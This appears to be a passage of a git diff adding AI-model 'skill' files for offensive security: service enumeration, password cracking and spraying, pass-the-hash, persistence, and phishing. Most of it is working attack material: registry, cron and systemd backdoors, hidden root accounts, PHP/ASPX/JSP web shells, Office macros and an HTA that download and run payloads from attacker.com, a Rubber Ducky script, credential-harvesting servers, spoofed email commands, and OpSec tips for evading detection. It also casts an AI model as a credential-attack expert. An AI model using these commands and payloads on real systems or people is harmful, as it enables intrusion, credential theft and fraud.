showmount -e 10.10.10.10
# Nmap
nmap -p 2049 --script nfs-* 10.10.10.10
```
**Mount NFS:**
```bash
# Mount share
mkdir /mnt/nfs
mount -t nfs 10.10.10.10:/share /mnt/nfs
# List mounted shares
df -h
```
### 14. DNS (Port 53)
**Enumeration:**
```bash
# Zone transfer
dig axfr @10.10.10.10 domain.com
host -l domain.com 10.10.10.10
# DNS enumeration
dnsenum domain.com
dnsrecon -d domain.com -t std
fierce -dns domain.com
# Nmap
nmap -p 53 --script dns-* 10.10.10.10
```
### 15. SNMP (Port 161)
**Enumeration:**
```bash
# snmpwalk
snmpwalk -v2c -c public 10.10.10.10
snmpwalk -v2c -c public 10.10.10.10 1.3.6.1.2.1.1
# onesixtyone - community string brute force
onesixtyone -c community.txt 10.10.10.10
# snmp-check
snmp-check 10.10.10.10 -c public
```
## Quick Service Testing Commands
**Banner Grabbing:**
```bash
# Netcat
nc -nv 10.10.10.10 80
nc -nv 10.10.10.10 21
# Telnet
telnet 10.10.10.10 80
telnet 10.10.10.10 25
# Nmap
nmap -sV --script=banner 10.10.10.10
```
## Reference Links
- HackTricks Service Pentesting: https://github.com/HackTricks-wiki/hacktricks/tree/master/src/network-services-pentesting
- PayloadsAllTheThings: https://github.com/swisskyrepo/PayloadsAllTheThings
- Nmap Scripts: https://nmap.org/nsedoc/
## When to Use This Skill
Activate this skill when the user asks to:
- Enumerate network services on specific ports
- Test common network service vulnerabilities
- Connect to and exploit database services
- Perform service-specific reconnaissance
- Identify service misconfigurations
- Extract data from network services
- Help with network penetration testing
Always ensure proper authorization before testing any network services.

491
skills/password-attacks/SKILL.md Normal file
View File

@@ -0,0 +1,491 @@
---
name: cracking-passwords
description: Crack password hashes using hashcat/john, perform password spraying, brute force authentication, and execute pass-the-hash attacks. Use when cracking credentials or performing password-based attacks.
---
# Password Attacks and Credential Cracking Skill
You are a password cracking and credential attack expert. Use this skill when the user requests help with:
- Password hash cracking (hashcat, john)
- Hash identification and extraction
- Credential spraying and brute forcing
- Rainbow table attacks
- Pass-the-hash techniques
- Wordlist generation
- Rule-based attacks
## Core Methodologies
### 1. Hash Identification
**Identify Hash Type:**
```bash
# hashid
hashid 'hash_here'
hashid -m 'hash_here' # Show hashcat mode
# hash-identifier
hash-identifier
# haiti
haiti 'hash_here'
# Manual identification by format
# MD5: 32 hex chars
# SHA1: 40 hex chars
# SHA256: 64 hex chars
# NTLM: 32 hex chars (same as MD5 but context differs)
# bcrypt: $2a$, $2b$, $2y$ prefix
```
**Common Hash Formats:**
```
MD5: 5f4dcc3b5aa765d61d8327deb882cf99
SHA1: 5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8
SHA256: 5e884898da28047151d0e56f8dc6292773603d0d6aabbdd62a11ef721d1542d8
NTLM: 209c6174da490caeb422f3fa5a7ae634
NTLMv2: username::domain:challenge:response:response
bcrypt: $2a$10$N9qo8uLOickgx2ZMRZoMyeIjZAgcfl7p92ldGxad68LJZdL17lhWy
Linux SHA512: $6$rounds=5000$...
```
### 2. Hashcat Basics
**Installation:**
```bash
# Kali Linux
apt install hashcat
# Check GPUs
hashcat -I
```
**Basic Hashcat Usage:**
```bash
# Dictionary attack
hashcat -m <hash_type> -a 0 hashes.txt wordlist.txt
# Dictionary + rules
hashcat -m <hash_type> -a 0 hashes.txt wordlist.txt -r rules/best64.rule
# Brute force
hashcat -m <hash_type> -a 3 hashes.txt ?a?a?a?a?a?a?a?a
# Combination attack
hashcat -m <hash_type> -a 1 hashes.txt wordlist1.txt wordlist2.txt
# Show cracked passwords
hashcat -m <hash_type> hashes.txt --show
# Resume session
hashcat -m <hash_type> hashes.txt wordlist.txt --session mysession
hashcat --session mysession --restore
```
**Common Hash Types (-m flag):**
```bash
0 = MD5
100 = SHA1
1400 = SHA256
1700 = SHA512
1000 = NTLM
5600 = NetNTLMv2
3200 = bcrypt
1800 = sha512crypt (Linux)
7500 = Kerberos 5 AS-REP (krb5asrep)
13100 = Kerberos 5 TGS-REP (krb5tgs)
18200 = Kerberos 5 AS-REP (asreproast)
16800 = WPA-PMKID-PBKDF2
22000 = WPA-PBKDF2-PMKID+EAPOL
```
**Hashcat Attack Modes:**
```bash
-a 0 # Dictionary attack
-a 1 # Combination attack
-a 3 # Brute-force attack
-a 6 # Hybrid wordlist + mask
-a 7 # Hybrid mask + wordlist
```
**Hashcat Masks:**
```bash
?l = lowercase letters (a-z)
?u = uppercase letters (A-Z)
?d = digits (0-9)
?s = special characters
?a = all characters (?l?u?d?s)
?b = binary (0x00 - 0xff)
# Examples
?u?l?l?l?l?d?d # Password01
?d?d?d?d # 4-digit PIN
?a?a?a?a?a?a # 6 characters (any)
```
### 3. John the Ripper
**Basic John Usage:**
```bash
# Auto-detect and crack
john hashes.txt
# Specify format
john --format=NT hashes.txt
john --format=Raw-SHA256 hashes.txt
# With wordlist
john --wordlist=rockyou.txt hashes.txt
# With rules
john --wordlist=wordlist.txt --rules hashes.txt
# Show cracked passwords
john --show hashes.txt
john --show --format=NT hashes.txt
# List formats
john --list=formats
```
**Common John Formats:**
```bash
Raw-MD5
Raw-SHA1
Raw-SHA256
NT (NTLM)
LM
bcrypt
sha512crypt
krb5asrep
krb5tgs
```
**Unshadow (Linux):**
```bash
# Combine passwd and shadow files
unshadow passwd shadow > unshadowed.txt
john unshadowed.txt
```
### 4. Specific Hash Type Attacks
**NTLM Hashes:**
```bash
# Hashcat
hashcat -m 1000 -a 0 ntlm.txt rockyou.txt -r rules/best64.rule
# John
john --format=NT --wordlist=rockyou.txt ntlm.txt
```
**NTLMv2 (NetNTLMv2):**
```bash
# Hashcat
hashcat -m 5600 ntlmv2.txt rockyou.txt
# Captured from Responder
hashcat -m 5600 Responder-Session.txt rockyou.txt
```
**Kerberoast (TGS-REP):**
```bash
# Hashcat (RC4)
hashcat -m 13100 tgs.txt rockyou.txt --force
# John
john --format=krb5tgs --wordlist=rockyou.txt tgs.txt
```
**ASREPRoast:**
```bash
# Hashcat
hashcat -m 18200 asrep.txt rockyou.txt
# John
john --format=krb5asrep asrep.txt
```
**bcrypt:**
```bash
# Hashcat (slow!)
hashcat -m 3200 bcrypt.txt wordlist.txt
# John
john --format=bcrypt bcrypt.txt
```
**Linux SHA512 ($6$):**
```bash
# Hashcat
hashcat -m 1800 shadow.txt rockyou.txt
# John
john --format=sha512crypt shadow.txt
```
**WPA/WPA2:**
```bash
# Convert pcap to hashcat format
hcxpcapngtool -o hash.hc22000 capture.pcap
# Crack PMKID
hashcat -m 22000 hash.hc22000 wordlist.txt
# Or convert with aircrack tools
aircrack-ng -J output capture.cap
hccap2john output.hccap > hash.john
john hash.john
```
### 5. Wordlist Generation
**CeWL (Web Scraping):**
```bash
# Generate wordlist from website
cewl -d 2 -m 5 -w wordlist.txt https://example.com
# Include email addresses
cewl -e -d 2 -m 5 -w wordlist.txt https://example.com
```
**crunch:**
```bash
# Generate all combinations
crunch 6 8 -t Pass@@@ -o wordlist.txt
# @=lowercase, ,=uppercase, %=numbers, ^=symbols
# Generate passwords between 6-8 chars
crunch 6 8 abcdefg123 -o wordlist.txt
# Pattern-based (e.g., Month+Year)
crunch 10 10 -t @@@@@@@%%% -o wordlist.txt
```
**John Mutation Rules:**
```bash
# Generate mutations
john --wordlist=base.txt --rules --stdout > mutated.txt
# Custom rule
# In john.conf:
[List.Rules:CustomRule]
l # lowercase all
u # uppercase all
c # capitalize
$[0-9] # append digit
^[0-9] # prepend digit
```
**Maskprocessor:**
```bash
# Generate based on mask
mp64.exe ?u?l?l?l?l?d?d?d
mp64.exe -1 ?l?u -2 ?d?s ?1?1?1?1?2?2
```
**CUPP (User Profile):**
```bash
# Interactive wordlist generator based on target info
python3 cupp.py -i
```
### 6. Credential Spraying
**Spray Weak Passwords:**
```bash
# Common weak passwords
Password123
Welcome123
Company123
Spring2024
Summer2024
```
**SMB Password Spray:**
```bash
# crackmapexec
crackmapexec smb 10.10.10.0/24 -u users.txt -p 'Password123' --continue-on-success
# Single password, multiple users
crackmapexec smb 10.10.10.10 -u users.txt -p 'Password123'
```
**Kerberos Password Spray:**
```bash
# kerbrute
kerbrute passwordspray -d domain.local users.txt Password123
# Impacket
for user in $(cat users.txt); do
GetNPUsers.py domain.local/${user}:Password123 -dc-ip 10.10.10.10 -no-pass -request
done
```
**RDP Password Spray:**
```bash
# crowbar
crowbar -b rdp -s 10.10.10.10/32 -U users.txt -c 'Password123'
# hydra (be careful - noisy!)
hydra -L users.txt -p 'Password123' rdp://10.10.10.10
```
### 7. Online Brute Force
**Hydra:**
```bash
# HTTP POST login
hydra -L users.txt -P passwords.txt 10.10.10.10 http-post-form "/login:username=^USER^&password=^PASS^:Invalid"
# SSH
hydra -l root -P passwords.txt ssh://10.10.10.10
# FTP
hydra -l admin -P passwords.txt ftp://10.10.10.10
# SMB
hydra -L users.txt -P passwords.txt smb://10.10.10.10
# RDP
hydra -L users.txt -P passwords.txt rdp://10.10.10.10
```
**Medusa:**
```bash
# SSH
medusa -h 10.10.10.10 -u admin -P passwords.txt -M ssh
# SMB
medusa -h 10.10.10.10 -U users.txt -P passwords.txt -M smbnt
```
### 8. Pass-the-Hash
**Extract NTLM Hashes:**
```bash
# secretsdump (from SAM)
secretsdump.py -sam sam.hive -system system.hive LOCAL
# secretsdump (from DC)
secretsdump.py domain/user:password@10.10.10.10
# mimikatz
sekurlsa::logonpasswords
lsadump::sam
```
**Use NTLM Hash:**
```bash
# pth-winexe
pth-winexe -U domain/user%hash //10.10.10.10 cmd
# crackmapexec
crackmapexec smb 10.10.10.10 -u administrator -H 'hash' -x whoami
# psexec.py
psexec.py -hashes :hash administrator@10.10.10.10
# wmiexec.py
wmiexec.py -hashes :hash administrator@10.10.10.10
```
## Useful Wordlists
**Common Locations:**
```bash
# Kali Linux
/usr/share/wordlists/rockyou.txt
/usr/share/seclists/Passwords/
# Download rockyou
gunzip /usr/share/wordlists/rockyou.txt.gz
```
**SecLists:**
```bash
# Download
git clone https://github.com/danielmiessler/SecLists.git
# Common passwords
SecLists/Passwords/Common-Credentials/10-million-password-list-top-1000000.txt
SecLists/Passwords/Common-Credentials/10k-most-common.txt
```
**Custom Wordlists:**
```bash
# Generate targeted wordlist
# Combine company name, years, common patterns
# Example: CompanyName2024!, CompanyName@2024, etc.
```
## Performance Optimization
**Hashcat Optimizations:**
```bash
# Use GPU
hashcat -m 1000 hashes.txt wordlist.txt -d 1
# Increase workload
hashcat -m 1000 hashes.txt wordlist.txt -w 3 # 1-4, higher = faster
# Show status
hashcat -m 1000 hashes.txt wordlist.txt --status --status-timer=10
# Benchmark
hashcat -b
# Use rules efficiently
hashcat -m 1000 hashes.txt wordlist.txt -r rules/best64.rule --loopback
```
## Troubleshooting
**Hashcat Not Using GPU:**
```bash
# Check GPU drivers
nvidia-smi # NVIDIA
rocm-smi # AMD
# Force specific device
hashcat -d 1 ...
```
**Hash Format Issues:**
```bash
# Remove username prefix
cut -d: -f2 hashes.txt > clean_hashes.txt
# Ensure proper format (user:hash)
cat hashes.txt | awk -F: '{print $1":"$4}'
```
**Slow Cracking:**
```bash
# Try smaller wordlist first
# Use targeted rules
# Consider cloud GPU instances
# Use mask attack for known patterns
```
## Reference Links
- Hashcat Wiki: https://hashcat.net/wiki/
- John the Ripper: https://www.openwall.com/john/
- SecLists: https://github.com/danielmiessler/SecLists
- HackTricks Password Attacks: https://book.hacktricks.xyz/generic-methodologies-and-resources/brute-force
## When to Use This Skill
Activate this skill when the user asks to:
- Crack password hashes
- Identify unknown hash types
- Perform password spraying
- Generate wordlists
- Optimize hashcat/john performance
- Extract and crack credentials
- Perform pass-the-hash attacks
- Help with credential-based attacks
Always ensure proper authorization before performing password attacks.

518
skills/persistence-techniques/SKILL.md Normal file
View File

@@ -0,0 +1,518 @@
---
name: establishing-persistence
description: Establish persistence on Windows and Linux systems using registry keys, scheduled tasks, services, cron jobs, SSH keys, backdoor accounts, and rootkits. Use when performing post-exploitation or maintaining long-term access.
---
# Establishing Persistence
## When to Use
- Maintaining access to compromised systems
- Post-exploitation techniques
- Red team operations
- Persistence testing
- Backdoor creation
## Windows Persistence
### Registry Run Keys
```cmd
# HKCU Run (current user)
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v Backdoor /t REG_SZ /d "C:\Windows\Temp\backdoor.exe"
# HKLM Run (all users - requires admin)
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v Backdoor /t REG_SZ /d "C:\Windows\Temp\backdoor.exe"
# RunOnce (runs once then deletes)
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce" /v Backdoor /t REG_SZ /d "C:\Windows\Temp\backdoor.exe"
# Policies Run
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run" /v Backdoor /t REG_SZ /d "C:\Windows\Temp\backdoor.exe"
```
**PowerShell Registry:**
```powershell
# HKCU Run
New-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "Backdoor" -Value "C:\Windows\Temp\backdoor.exe" -PropertyType String
# Verify
Get-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run"
```
### Scheduled Tasks
```cmd
# Create task to run at logon
schtasks /create /tn "WindowsUpdate" /tr "C:\Windows\Temp\backdoor.exe" /sc onlogon /ru System
# Run every hour
schtasks /create /tn "SystemCheck" /tr "C:\Windows\Temp\backdoor.exe" /sc hourly /ru System
# Run daily at specific time
schtasks /create /tn "Maintenance" /tr "C:\Windows\Temp\backdoor.exe" /sc daily /st 09:00 /ru System
# Run on system startup
schtasks /create /tn "StartupTask" /tr "C:\Windows\Temp\backdoor.exe" /sc onstart /ru System
# List tasks
schtasks /query /fo LIST /v
```
**PowerShell Scheduled Task:**
```powershell
$action = New-ScheduledTaskAction -Execute "C:\Windows\Temp\backdoor.exe"
$trigger = New-ScheduledTaskTrigger -AtLogon
Register-ScheduledTask -Action $action -Trigger $trigger -TaskName "WindowsUpdate" -Description "System Maintenance"
```
### Windows Services
```cmd
# Create new service
sc create "WindowsUpdate" binPath= "C:\Windows\Temp\backdoor.exe" start= auto
sc description "WindowsUpdate" "Keeps your Windows system updated"
# Start service
sc start "WindowsUpdate"
# Modify existing service
sc config "ServiceName" binPath= "C:\Windows\Temp\backdoor.exe"
# Service with SYSTEM privileges
sc create "SecurityUpdate" binPath= "C:\Windows\Temp\backdoor.exe" start= auto obj= LocalSystem
```
**PowerShell Service:**
```powershell
New-Service -Name "WindowsDefender" -BinaryPathName "C:\Windows\Temp\backdoor.exe" -DisplayName "Windows Defender Update" -StartupType Automatic
Start-Service "WindowsDefender"
```
### WMI Event Subscription
```powershell
# Create WMI event to run payload on logon
$Filter = Set-WmiInstance -Namespace root\subscription -Class __EventFilter -Arguments @{
Name = "UserLogon";
EventNamespace = "root\cimv2";
QueryLanguage = "WQL";
Query = "SELECT * FROM __InstanceCreationEvent WITHIN 15 WHERE TargetInstance ISA 'Win32_LogonSession'";
}
$Consumer = Set-WmiInstance -Namespace root\subscription -Class CommandLineEventConsumer -Arguments @{
Name = "RunBackdoor";
CommandLineTemplate = "C:\Windows\Temp\backdoor.exe";
}
Set-WmiInstance -Namespace root\subscription -Class __FilterToConsumerBinding -Arguments @{
Filter = $Filter;
Consumer = $Consumer;
}
```
### Startup Folder
```cmd
# Current user startup
copy backdoor.exe "%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\WindowsUpdate.exe"
# All users startup (requires admin)
copy backdoor.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\WindowsUpdate.exe"
```
### DLL Hijacking
```cmd
# Place malicious DLL in application directory
# Common DLL hijacking candidates:
# - version.dll
# - wlbsctrl.dll
# - oci.dll
copy evil.dll "C:\Program Files\Application\version.dll"
```
### Image File Execution Options
```cmd
# Hijack executable launch
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /t REG_SZ /d "C:\Windows\System32\cmd.exe"
# Now pressing Shift 5 times at login opens cmd.exe
```
### AppInit_DLLs
```cmd
# Load DLL into every process (requires admin)
reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Windows" /v AppInit_DLLs /t REG_SZ /d "C:\Windows\Temp\evil.dll"
reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Windows" /v LoadAppInit_DLLs /t REG_DWORD /d 1
```
### Backdoor Accounts
```cmd
# Create hidden admin account
net user backdoor P@ssw0rd /add
net localgroup Administrators backdoor /add
# Hide account (ends with $)
net user backdoor$ P@ssw0rd /add
net localgroup Administrators backdoor$ /add
# Disable account logging
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v backdoor /t REG_DWORD /d 0
```
## Linux Persistence
### Cron Jobs
```bash
# User crontab (no sudo needed)
crontab -e
# Add:
@reboot /tmp/.backdoor
0 * * * * /tmp/.backdoor # Every hour
# System-wide cron (requires root)
echo "@reboot root /tmp/.backdoor" >> /etc/crontab
# Cron.d directory
echo "* * * * * root /tmp/.backdoor" > /etc/cron.d/backdoor
# Daily/hourly cron scripts
cp backdoor.sh /etc/cron.daily/update
chmod +x /etc/cron.daily/update
```
### Systemd Services
```bash
# Create service file
cat > /etc/systemd/system/backdoor.service << EOF
[Unit]
Description=System Update Service
After=network.target
[Service]
Type=simple
ExecStart=/tmp/.backdoor
Restart=always
[Install]
WantedBy=multi-user.target
EOF
# Enable and start
systemctl daemon-reload
systemctl enable backdoor.service
systemctl start backdoor.service
# Verify
systemctl status backdoor.service
```
### RC Scripts (Init.d)
```bash
# Create init script
cat > /etc/init.d/backdoor << EOF
#!/bin/bash
### BEGIN INIT INFO
# Provides: backdoor
# Required-Start: \$network
# Required-Stop:
# Default-Start: 2 3 4 5
# Default-Stop: 0 1 6
### END INIT INFO
/tmp/.backdoor &
EOF
chmod +x /etc/init.d/backdoor
update-rc.d backdoor defaults
```
### SSH Keys
```bash
# Add attacker's public key
mkdir -p /root/.ssh
echo "ssh-rsa AAAA...attacker_key" >> /root/.ssh/authorized_keys
chmod 600 /root/.ssh/authorized_keys
# For specific user
echo "ssh-rsa AAAA...attacker_key" >> /home/user/.ssh/authorized_keys
```
### .bashrc / .bash_profile
```bash
# Add to user's .bashrc
echo "/tmp/.backdoor &" >> ~/.bashrc
echo "/tmp/.backdoor &" >> ~/.bash_profile
# Root .bashrc
echo "/tmp/.backdoor &" >> /root/.bashrc
```
### LD_PRELOAD
```bash
# Hijack library loading
echo "/tmp/evil.so" > /etc/ld.so.preload
# Will load evil.so into every process
```
### MOTD Backdoor
```bash
# Add to message of the day scripts (runs on SSH login)
echo "/tmp/.backdoor &" >> /etc/update-motd.d/00-header
chmod +x /etc/update-motd.d/00-header
```
### APT/Package Manager
```bash
# APT hook (Debian/Ubuntu)
cat > /etc/apt/apt.conf.d/99backdoor << EOF
APT::Update::Pre-Invoke {"/tmp/.backdoor &";};
EOF
# Runs before apt update
```
### Git Hooks
```bash
# If git repositories exist
echo "/tmp/.backdoor &" > /path/to/repo/.git/hooks/post-checkout
chmod +x /path/to/repo/.git/hooks/post-checkout
# Triggers on git checkout
```
### Backdoor Accounts
```bash
# Create backdoor user with root UID
useradd -u 0 -o -g 0 -M -d /root -s /bin/bash backdoor
echo "backdoor:P@ssw0rd" | chpasswd
# Or add to /etc/passwd directly
echo "backdoor:x:0:0::/root:/bin/bash" >> /etc/passwd
echo "backdoor:$(openssl passwd -6 P@ssw0rd):::::::" >> /etc/shadow
```
### PAM Backdoor
```bash
# Add to /etc/pam.d/sshd or /etc/pam.d/common-auth
# Use custom PAM module that accepts magic password
auth sufficient pam_unix.so try_first_pass
auth sufficient /lib/security/pam_backdoor.so
```
## Web Shells
### PHP Web Shell
```php
<?php
// simple.php
system($_GET['cmd']);
?>
// Advanced
<?php
if($_GET['key'] == 'secret') {
eval($_POST['cmd']);
}
?>
```
**Upload Locations:**
```bash
# Web roots
/var/www/html/
/var/www/
/usr/share/nginx/html/
C:\inetpub\wwwroot\
# Hidden names
.htaccess.php
favicon.ico.php
robots.txt.php
```
### ASP/ASPX Web Shell
```asp
<%@ Page Language="C#" %>
<%
Response.Write(System.Diagnostics.Process.Start("cmd.exe","/c " + Request["cmd"]).StandardOutput.ReadToEnd());
%>
```
### JSP Web Shell
```jsp
<%
Runtime.getRuntime().exec(request.getParameter("cmd"));
%>
```
## Container Persistence
**Docker:**
```bash
# Modify container to restart always
docker update --restart=always container_name
# Add to docker-compose.yml
restart: always
# Create new container with backdoor
docker run -d --restart=always --name backdoor evil_image
```
**Kubernetes:**
```yaml
# DaemonSet (runs on all nodes)
apiVersion: apps/v1
kind: DaemonSet
metadata:
name: backdoor
spec:
selector:
matchLabels:
name: backdoor
template:
metadata:
labels:
name: backdoor
spec:
containers:
- name: backdoor
image: attacker/backdoor:latest
```
## Cloud Persistence
### AWS
```bash
# Create IAM user
aws iam create-user --user-name backdoor
# Attach admin policy
aws iam attach-user-policy --user-name backdoor --policy-arn arn:aws:iam::aws:policy/AdministratorAccess
# Create access key
aws iam create-access-key --user-name backdoor
# Lambda function persistence
# Create Lambda that executes periodically via CloudWatch Events
```
### Azure
```bash
# Create service principal
az ad sp create-for-rbac --name "backdoor" --role Contributor
# Create managed identity
az identity create --name backdoor --resource-group RG
# Function App persistence
# Deploy Azure Function that runs on schedule
```
## Rootkits
**User-mode Rootkit:**
- Hook library functions
- Process hiding
- File hiding
- Network hiding
**Kernel-mode Rootkit:**
- Loadable kernel module (LKM)
- Hooks system calls
- Harder to detect
- Requires root
```bash
# Example LKM (requires kernel headers)
# Compile and load malicious kernel module
insmod backdoor.ko
```
## Persistence Detection
**Windows:**
```powershell
# Check Run keys
Get-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run"
Get-ItemProperty -Path "HKLM:\Software\Microsoft\Windows\CurrentVersion\Run"
# Check scheduled tasks
Get-ScheduledTask | Where-Object {$_.TaskPath -notlike "\Microsoft*"}
# Check services
Get-Service | Where-Object {$_.StartType -eq "Automatic"}
# Check WMI subscriptions
Get-WMIObject -Namespace root\Subscription -Class __EventFilter
Get-WMIObject -Namespace root\Subscription -Class __EventConsumer
Get-WMIObject -Namespace root\Subscription -Class __FilterToConsumerBinding
```
**Linux:**
```bash
# Check cron jobs
crontab -l
ls -la /etc/cron.*
cat /etc/crontab
# Check systemd services
systemctl list-unit-files --type=service --state=enabled
# Check init scripts
ls -la /etc/init.d/
# Check SSH authorized_keys
cat ~/.ssh/authorized_keys
cat /root/.ssh/authorized_keys
# Check LD_PRELOAD
cat /etc/ld.so.preload
# Check for hidden files
find / -name ".*"
```
## OpSec Tips
- **Blend in** - Use system-like names (WindowsUpdate, SystemCheck)
- **Redundancy** - Establish multiple persistence methods
- **Stealth** - Avoid noisy methods that generate logs
- **Cleanup** - Remove persistence when engagement ends
- **Timestamps** - Match file timestamps to system files
## Tools
- **PowerSploit** - PowerShell post-exploitation
- **Empire** - Post-exploitation framework
- **Metasploit** - Persistence modules
- **SILENTTRINITY** - Modern C2 framework
- **Covenant** - .NET C2 framework
## References
- https://attack.mitre.org/tactics/TA0003/
- https://book.hacktricks.xyz/
- https://github.com/PowerShellMafia/PowerSploit

427
skills/phishing-social-engineering/SKILL.md Normal file
View File

@@ -0,0 +1,427 @@
---
name: performing-social-engineering
description: Conduct phishing campaigns, credential harvesting, pretexting, and social engineering attacks using tools like Gophish, SET, and custom techniques. Use when performing social engineering assessments or red team engagements.
---
# Performing Social Engineering
## When to Use
- Phishing campaign execution
- Credential harvesting operations
- Social engineering assessments
- Red team engagements
- Security awareness testing
## Phishing Infrastructure
### Gophish (Phishing Framework)
```bash
# Install
wget https://github.com/gophish/gophish/releases/download/v0.12.1/gophish-v0.12.1-linux-64bit.zip
unzip gophish-v0.12.1-linux-64bit.zip
chmod +x gophish
./gophish
# Access web interface
https://localhost:3333
# Default: admin:gophish
```
**Gophish Campaign Setup:**
1. **Email Templates** - Create convincing phishing emails
2. **Landing Pages** - Clone legitimate sites for credential harvesting
3. **Sending Profiles** - Configure SMTP server
4. **Groups** - Import target user lists
5. **Campaign** - Combine all elements and launch
### SET (Social Engineering Toolkit)
```bash
# Launch SET
setoolkit
# Common modules:
# 1) Social-Engineering Attacks
# 1) Spear-Phishing Attack Vectors
# 2) Website Attack Vectors
# 3) Credential Harvester Attack Method
```
**Credential Harvester:**
```bash
# SET Menu:
# 1 -> 2 -> 3 (Credential Harvester)
# Choose site template or custom URL
# Enter attacker IP
# Hosts fake login page
# Captures credentials when submitted
```
## Email Phishing
### Email Spoofing
```bash
# sendEmail (simple SMTP client)
sendEmail -f ceo@company.com \
-t target@company.com \
-u "Urgent: Password Reset Required" \
-m "Click here to reset: http://evil.com/reset" \
-s smtp.server.com:25
# swaks (SMTP testing tool)
swaks --to target@company.com \
--from ceo@company.com \
--header "Subject: Important Update" \
--body "Please review: http://evil.com" \
--server smtp.company.com
```
### Attachment-Based Phishing
**Malicious Office Macros:**
```vba
' Excel/Word VBA macro
Sub AutoOpen()
Shell "powershell -nop -w hidden -c ""IEX((new-object net.webclient).downloadstring('http://attacker.com/payload.ps1'))"""
End Sub
```
**Malicious PDF:**
```bash
# Create PDF with embedded JavaScript
# Use tools like:
# - metasploit (exploit/windows/fileformat/adobe_pdf_embedded_exe)
# - PDFtk
# - malicious JavaScript injection
```
**Malicious HTA:**
```html
<!-- malicious.hta -->
<html>
<head>
<script language="VBScript">
Set objShell = CreateObject("Wscript.Shell")
objShell.Run "powershell -w hidden -c IEX(New-Object Net.WebClient).DownloadString('http://attacker.com/payload.ps1')"
window.close()
</script>
</head>
</html>
```
### Clone Legitimate Sites
```bash
# HTTrack website copier
httrack http://legitimate-site.com -O ./cloned_site/
# wget mirror
wget --mirror --convert-links --adjust-extension --page-requisites --no-parent http://legitimate-site.com
# Manual with curl
curl -o index.html http://legitimate-site.com/login
# Modify form action to send credentials to attacker
<form action="http://attacker.com/harvest.php" method="POST">
```
### Credential Harvesting Server
**Simple PHP Harvester:**
```php
<?php
// harvest.php
$file = 'credentials.txt';
$username = $_POST['username'];
$password = $_POST['password'];
$data = "User: $username | Pass: $password | IP: " . $_SERVER['REMOTE_ADDR'] . " | " . date('Y-m-d H:i:s') . "\n";
file_put_contents($file, $data, FILE_APPEND);
// Redirect to real site
header('Location: https://real-site.com');
?>
```
**Python Flask Harvester:**
```python
from flask import Flask, request, redirect
app = Flask(__name__)
@app.route('/login', methods=['POST'])
def harvest():
with open('creds.txt', 'a') as f:
f.write(f"User: {request.form['username']}, Pass: {request.form['password']}\n")
return redirect('https://real-site.com')
if __name__ == '__main__':
app.run(host='0.0.0.0', port=80)
```
## Voice Phishing (Vishing)
### SpoofCard/Caller ID Spoofing
- Services to spoof caller ID
- Impersonate IT support, executives, vendors
- Social engineering over phone
**Common Pretexts:**
- IT support needing to verify credentials
- HR department verifying personal information
- Finance department confirming wire transfer
- Vendor requiring payment information update
## SMS Phishing (Smishing)
```bash
# Send SMS with link
# Use services or tools like:
# - Twilio API
# - SMS gateways
# - SIM card with AT commands
# Example pretext:
"Your package delivery failed. Track here: http://evil.com/track"
"Your account has been locked. Reset here: http://evil.com/unlock"
"You've won a prize! Claim here: http://evil.com/claim"
```
## USB Drop Attacks
### Rubber Ducky / Bad USB
**Ducky Script Example:**
```
REM Open PowerShell and download payload
DELAY 2000
GUI r
DELAY 500
STRING powershell -w hidden
ENTER
DELAY 1000
STRING IEX(New-Object Net.WebClient).DownloadString('http://attacker.com/payload.ps1')
ENTER
```
**Bash Bunny:**
```bash
# Payloads at /payloads/switch1/
# Example: exfiltrate files, run payload, etc.
```
### Physical USB Drops
**Pretexts:**
- "Company Financial Data 2024"
- "Salary Information - Confidential"
- "Employee Bonuses Q4"
- "IT Security Update - Required"
**Payload Ideas:**
- Reverse shell
- Credential stealer
- Keylogger
- Data exfiltration
- Persistence mechanisms
## QR Code Phishing
```bash
# Generate QR code pointing to phishing site
qrencode -o evil_qr.png "http://evil.com/harvest"
# Print and place in physical locations:
# - "Scan for Free WiFi"
# - "Employee Portal Access"
# - "Building Directory"
```
## Watering Hole Attacks
1. **Identify** target organization's commonly visited sites
2. **Compromise** the website (or create lookalike)
3. **Inject** malicious code (exploit or profiling)
4. **Wait** for targets to visit and get compromised
## Browser-Based Attacks
### BeEF (Browser Exploitation Framework)
```bash
# Start BeEF
./beef
# Hook browsers with:
<script src="http://attacker-ip:3000/hook.js"></script>
# Access UI
http://127.0.0.1:3000/ui/panel
# Default: beef:beef
# Commands:
# - Social Engineering (fake notifications)
# - Browser exploitation
# - Network discovery
# - Credential harvesting
```
### Fake Update Pages
```html
<!-- fake-update.html -->
<html>
<head><title>Critical Browser Update Required</title></head>
<body>
<h1>Your browser is out of date!</h1>
<p>Click here to download the latest security update.</p>
<a href="http://attacker.com/malware.exe">Download Update</a>
</body>
</html>
```
## Pretexting Scenarios
**IT Support:**
- "Hi, this is John from IT. We're doing routine password resets..."
- "We've detected suspicious activity on your account..."
- "Your VPN certificate is expiring, we need to update it..."
**Executive Impersonation:**
- "This is [CEO name], I'm in a meeting and need you to..."
- "Urgent: Wire transfer needed before end of day..."
- "I'm traveling and can't access my account, can you help me..."
**Vendor/Partner:**
- "This is accounting from [vendor]. We need to update payment information..."
- "Your invoice is past due, please update billing details..."
**Delivery/Shipping:**
- "Package delivery failed, verify address..."
- "Customs clearance required, pay fee at..."
## LinkedIn/Social Media Reconnaissance
```bash
# Gather employee information
# - Job titles
# - Organizational structure
# - Technologies used
# - Recent activities/projects
# Tools:
# - theHarvester
# - linkedin2username
# - hunter.io (email patterns)
# Use for:
# - Targeted phishing
# - Pretexting scenarios
# - Impersonation attacks
```
